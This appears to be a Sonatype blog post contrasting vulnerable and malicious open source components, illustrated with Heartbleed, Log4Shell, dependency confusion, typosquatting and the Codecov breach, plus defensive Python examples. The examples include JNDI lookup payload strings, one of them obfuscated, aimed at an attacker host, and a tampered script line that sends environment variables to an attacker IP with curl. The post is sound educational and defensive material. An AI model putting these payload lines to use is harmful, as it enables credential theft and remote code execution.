As evidenced by the ongoing evolution of cyber attacks, vulnerabilities and malware in open source software stand out as formidable challenges to the security and integrity of your software supply chain.
At first glance, these two terms might appear almost interchangeable, but their distinctions are fundamental. They represent two distinct yet related aspects of cybersecurity.
Additionally, modern usage of each term is often overly simplistic or outright incorrect, especially in the context of software supply chains. "Vulnerabilities" are not threats, but they can be exploited by threat actors. "Malware" is not synonymous with "virus," but it does involve intent to do harm.
In the context of open source software and for the scope of this blog post, we define the following:
Vulnerabilities: Vulnerable components that can be exploited.
Malware: Intentionally malicious components that can insert harmful code into projects and ecosystems.
Because open source software comprises up to 90% of modern software, understanding vulnerable components, intentionally malicious components, and the nuances between them remains important not only to developers but also to DevOps and security teams.
This blog post sheds light on the disparities between these terms, highlighting their unique characteristics, means of exploitation, and impact in open source software.
A vulnerable component contains a flaw in its code, much like a faulty lock on a door. Vulnerable components are not created with malicious intent but are inherent weaknesses in software supply chains.
Vulnerable components can exist in various software elements, such as:
operating systems
applications
libraries
plugins
Just as a faulty lock compromises the security of a building by allowing unauthorized access, a vulnerable component creates an entry point for attackers to exploit, potentially leading to unauthorized access to a system, application, or component.
Much like how an intruder can bypass a faulty lock to enter a building without a key, threat actors exploit vulnerable components to compromise the software. This exploitation can result in severe consequences, such as surreptitious data access, injection of malicious code, or disruption of the software's intended functionality.
Vulnerable components typically originate from coding errors, design flaws, or inadequate security measures during software development. Once identified, a vulnerability usually receives a unique identifier from the Common Vulnerabilities and Exposures (CVE) program. This CVE number serves as a shorthand reference for tracking and discussing the vulnerability.
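Because CVE identifiers follow a predictable shape (the prefix CVE, a four-digit year, and a sequence number of four or more digits), they are easy to pull out of advisories or changelogs. The Python sketch below is a minimal illustration of that idea; the function name `find_cve_ids` and the sample advisory text are our own assumptions, not part of any CVE tooling.

```python
import re

# CVE IDs look like CVE-<4-digit year>-<sequence of 4 or more digits>,
# for example CVE-2014-0160.
CVE_PATTERN = re.compile(r"\bCVE-\d{4}-\d{4,}\b")


def find_cve_ids(text: str) -> list[str]:
    """Return each CVE ID mentioned in text, in first-seen order, without duplicates."""
    seen: list[str] = []
    for match in CVE_PATTERN.finditer(text):
        cve_id = match.group(0)
        if cve_id not in seen:
            seen.append(cve_id)
    return seen


# Hypothetical advisory text used only for illustration.
advisory = "Patch CVE-2014-0160 and CVE-2021-44228 first; CVE-2014-0160 is Heartbleed."
print(find_cve_ids(advisory))  # ['CVE-2014-0160', 'CVE-2021-44228']
```

A list like this can then be cross-checked against the components in your own dependency manifests.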
Efficiently identifying and addressing vulnerable components is crucial to ensure the security and reliability of your software supply chain and protect against potential breaches.
Below we cover a few real-life examples that originated from vulnerable components.
Heartbleed (CVE-2014-0160) was a critical vulnerability discovered in the OpenSSL cryptographic software library in April 2014. Threat actors exploited a vulnerable component in the implementation of the Transport Layer Security (TLS) Heartbeat extension, potentially exposing sensitive information like usernames, passwords, and private encryption keys.
The Heartbleed vulnerability affected a vast number of web servers and required prompt patching for mitigation.
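To make the flaw concrete: a heartbeat request carries a payload plus a field stating how long that payload is, and the vulnerable code trusted the stated length without checking it against what was actually received. The Python sketch below is a simplified simulation of that missing bounds check, not OpenSSL's actual code; the secret string, the memory layout, and both function names are hypothetical.

```python
# Hypothetical secret that happens to sit next to the payload in memory.
ADJACENT_SECRET = b"user=alice;password=hunter2"


def heartbeat_vulnerable(payload: bytes, claimed_length: int) -> bytes:
    """Echo back claimed_length bytes without checking the real payload size."""
    memory = payload + ADJACENT_SECRET  # simulated process memory
    return memory[:claimed_length]      # may read past the end of the payload


def heartbeat_patched(payload: bytes, claimed_length: int) -> bytes:
    """Silently discard requests whose claimed length exceeds the payload."""
    if claimed_length > len(payload):
        return b""
    return payload[:claimed_length]


print(heartbeat_vulnerable(b"PING", 4))   # honest request: b'PING'
print(heartbeat_vulnerable(b"PING", 20))  # over-read leaks part of the secret
print(heartbeat_patched(b"PING", 20))     # b''
```

The fix amounts to a single length comparison, which is part of why the faulty lock analogy fits: the flaw was an oversight, not a deliberately planted backdoor.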
The Log4Shell vulnerability (CVE-2021-44228) affected a widely used open source logging library called Log4j. Threat actors took advantage of a vulnerable component by sending specially crafted input that the library would then log, which allowed them to remotely execute malicious code.
This vulnerability greatly affected and continues to affect many organizations across the world. It highlighted the need for quick action and constant vigilance to address vulnerabilities, even in trusted libraries.
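The crafted input in Log4Shell attacks typically contained a JNDI lookup expression such as `${jndi:ldap://...}`, which vulnerable Log4j versions would resolve while writing the log entry. The Python sketch below flags only the plainest form of that pattern; the function name and sample strings are our own assumptions, and this kind of check is illustrative rather than a defense, since upgrading the library is the actual remedy.

```python
import re

# Matches only the plain "${jndi:" prefix, case-insensitively.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def looks_like_jndi_lookup(value: str) -> bool:
    """Return True if value contains an unobfuscated JNDI lookup expression."""
    return JNDI_LOOKUP.search(value) is not None


# Hypothetical request header values that an application might log.
print(looks_like_jndi_lookup("${jndi:ldap://attacker.example/a}"))  # True
print(looks_like_jndi_lookup("Mozilla/5.0 (X11; Linux x86_64)"))    # False

# Nested lookups can disguise the same payload, so simple matching misses it.
print(looks_like_jndi_lookup("${${lower:j}ndi:ldap://attacker.example/a}"))  # False
```

The last case shows why pattern matching alone was never sufficient and why patching the vulnerable component mattered so much.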
Another notable vulnerability (CVE-2022-22965) targeted the popular Spring Framework used in Java applications. Spring4Shell was a zero-day vulnerability, meaning that threat actors exploited a vulnerable component before a fix was even available.
This incident illustrated the importance of staying updated with the latest security patches and being aware of evolving threats in open source components.
Intentionally malicious components pose a significant threat to software supply chains and open source ecosystems. They encompass a wide range of malicious programs, such as viruses, worms, trojans, ransomware, spyware, and adware, all designed to gain unauthorized access to information or systems.
Taking many forms, intentionally malicious components target and compromise developer infrastructure, allowing threat actors to steal data, install harmful software, gain control of a network, or compromise software or hardware.
Oftentimes, intentionally malicious components appear legitimate but actually contain harmful code. Developers unknowingly download these components, not realizing how they could compromise their software supply chains.
Unlike vulnerabilities, intentionally malicious components can be challenging to track and mitigate because they are often distributed through public package repositories and may not receive a CVE number. This makes it difficult to fully understand the extent of a threat and how to protect any potentially affected systems.
Below we cover a few examples of software supply chain exploits that leverage intentionally malicious components to cause harm.
Namespace confusion is a malicious tactic in which attackers upload packages with the same name as internal packages to a public package repository, typically assigning a higher version number than what has been published within an organization's internal repository. The primary objective of this strategy is to deceive package managers into retrieving the highest version of the package from the public repository rather than from the secure internal one. This exploit leverages a widespread practice of utilizing version ranges instead of specifying precise version numbers in project manifests.
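The resolution behavior described above can be sketched in a few lines of Python. This is a toy model under stated assumptions, not how any particular package manager is implemented: the package name `acme-billing`, the index contents, and both resolver functions are hypothetical.

```python
def parse_version(version: str) -> tuple[int, ...]:
    """Turn '1.3.0' into (1, 3, 0) so versions compare numerically."""
    return tuple(int(part) for part in version.split("."))


# Hypothetical indexes: the attacker publishes the internal package name
# publicly with an inflated version number.
INDEXES = {
    "internal": {"acme-billing": ["1.2.0", "1.3.0"]},
    "public": {"acme-billing": ["99.0.0"]},
}


def resolve_highest(name: str) -> tuple[str, str]:
    """Naive resolution: take the highest version found on any index."""
    candidates = [
        (parse_version(version), version, index_name)
        for index_name, packages in INDEXES.items()
        for version in packages.get(name, [])
    ]
    if not candidates:
        raise LookupError(f"{name} not found on any index")
    _, version, index_name = max(candidates)
    return version, index_name


def resolve_pinned(name: str, pinned: str, index_name: str = "internal") -> tuple[str, str]:
    """Safer resolution: an exact version from a single trusted index."""
    if pinned not in INDEXES[index_name].get(name, []):
        raise LookupError(f"{name}=={pinned} not found on {index_name}")
    return pinned, index_name


print(resolve_highest("acme-billing"))          # ('99.0.0', 'public')
print(resolve_pinned("acme-billing", "1.3.0"))  # ('1.3.0', 'internal')
```

Pinning an exact version and restricting where a given name may be fetched from removes the ambiguity the attacker depends on.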
In December 2022, a namespace confusion attack targeted users of the PyTorch-nightly build. Attackers registered a package with a higher version on PyPI, exploiting the absence of namespace protection. When Python resolved dependencies, the attacker's intentionally malicious components took precedence, leading to data theft. PyTorch renamed and reserved the component name to prevent further exploitation. This incident underscores the need for stronger namespace and package name safeguards in upstream registries and highlights the importance of proactive supply chain management.
Typosquatting is a social engineering strategy for executing software supply chain attacks, relying on a deceptively straightforward technique. The approach involves choosing a popular component, subtly misspelling its name, and banking on the likelihood that developers will make typographical errors when adding a component and unknowingly download the threat actor’s intentionally malicious component instead of the legitimate one. A related variation, known as "brandjacking," involves closely spoofing a well-known brand to lure developers into unintentionally incorporating the attacker's packages instead of the legitimate components they were expecting.
A PyPI incident in August 2022 highlights the danger of typosquatting, where intentionally malicious Python packages impersonated legitimate ones. In this case, ransomware-laden packages masqueraded as "Requests," targeting developers who mistyped the library name. The ransomware encrypted files but offered decryption keys without a ransom demand, blurring the line between ethical and malicious intent.
Malicious code injection is a targeted attack that poses a significant threat to developers using open source components. In this tactic, a threat actor compromises a known legitimate open source package by introducing intentionally malicious components into its repository. This infiltration occurs either by compromising the project itself or by impersonating a trustworthy open source committer. The attacker disguises the intentionally malicious payload within seemingly harmless code changes, distributing it to users of the library and carrying out their nefarious objectives.
The Codecov incident in April 2021 serves as an example of malicious code injection. Exploiting an error in Codecov's Docker image creation process, threat actors tampered with the Bash Uploader script, allowing potential data exfiltration from customers' continuous integration environments. Remarkably, this breach remained undetected for over two months. The attackers subtly replaced Codecov's server IP address in the script, diverting system environment variables, including sensitive API keys and credentials, to their own IP address. This case underscores the gravity of malicious code injection and the imperative for heightened software supply chain security.
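One general safeguard against tampered scripts of this kind is to compare a downloaded file's checksum with a known-good value before running it. The Python sketch below is a minimal illustration, assuming the publisher shares the expected SHA-256 digest through a separate trusted channel; the script contents, the address in the tampered line, and the function names are hypothetical.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of data as a lowercase hex string."""
    return hashlib.sha256(data).hexdigest()


def verify_script(script: bytes, expected_sha256: str) -> bool:
    """Return True only if the script matches the published digest."""
    return hmac.compare_digest(sha256_hex(script), expected_sha256.lower())


# Hypothetical uploader script and a tampered copy with one added line
# that sends environment variables to an attacker-controlled address.
original = b"#!/bin/bash\nupload_report\n"
tampered = original + b"curl -d \"$(env)\" http://203.0.113.5/upload\n"

published_digest = sha256_hex(original)  # would come from a trusted channel

print(verify_script(original, published_digest))  # True
print(verify_script(tampered, published_digest))  # False
```

Even a one-line change produces a completely different digest, so a mismatch is a clear signal to stop and investigate before the script touches any credentials.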
While vulnerable and intentionally malicious components share a connection as security risks, knowing the difference is critical to effectively managing your open source components and protecting your software supply chain.
Sonatype Lifecycle focuses on vulnerability management throughout the software development lifecycle (SDLC). It integrates seamlessly into your development environment, enabling early detection of vulnerable components. With continuous monitoring and policy enforcement, Lifecycle helps prevent the incorporation of unapproved components, promotes secure coding practices, and enables you to fix open source vulnerabilities across your SDLC.
Sonatype Repository Firewall acts as a first line of defense that prevents intentionally malicious components from ever entering your software supply chain. It automatically blocks malicious packages from gaining access to your systems, significantly reducing the risk of compromise and data breaches. With its advanced threat intelligence, it stays up to date with the latest malware signatures, providing proactive protection against emerging threats.
With Sonatype Repository Firewall and Sonatype Lifecycle, you can defend against the ever-present threats posed by vulnerable and intentionally malicious components to ensure the security and reliability of your software supply chain. By prioritizing software security and adopting the right tools, you can confidently deliver secure applications to your users, mitigating the risk of breaches and preserving your organization's reputation.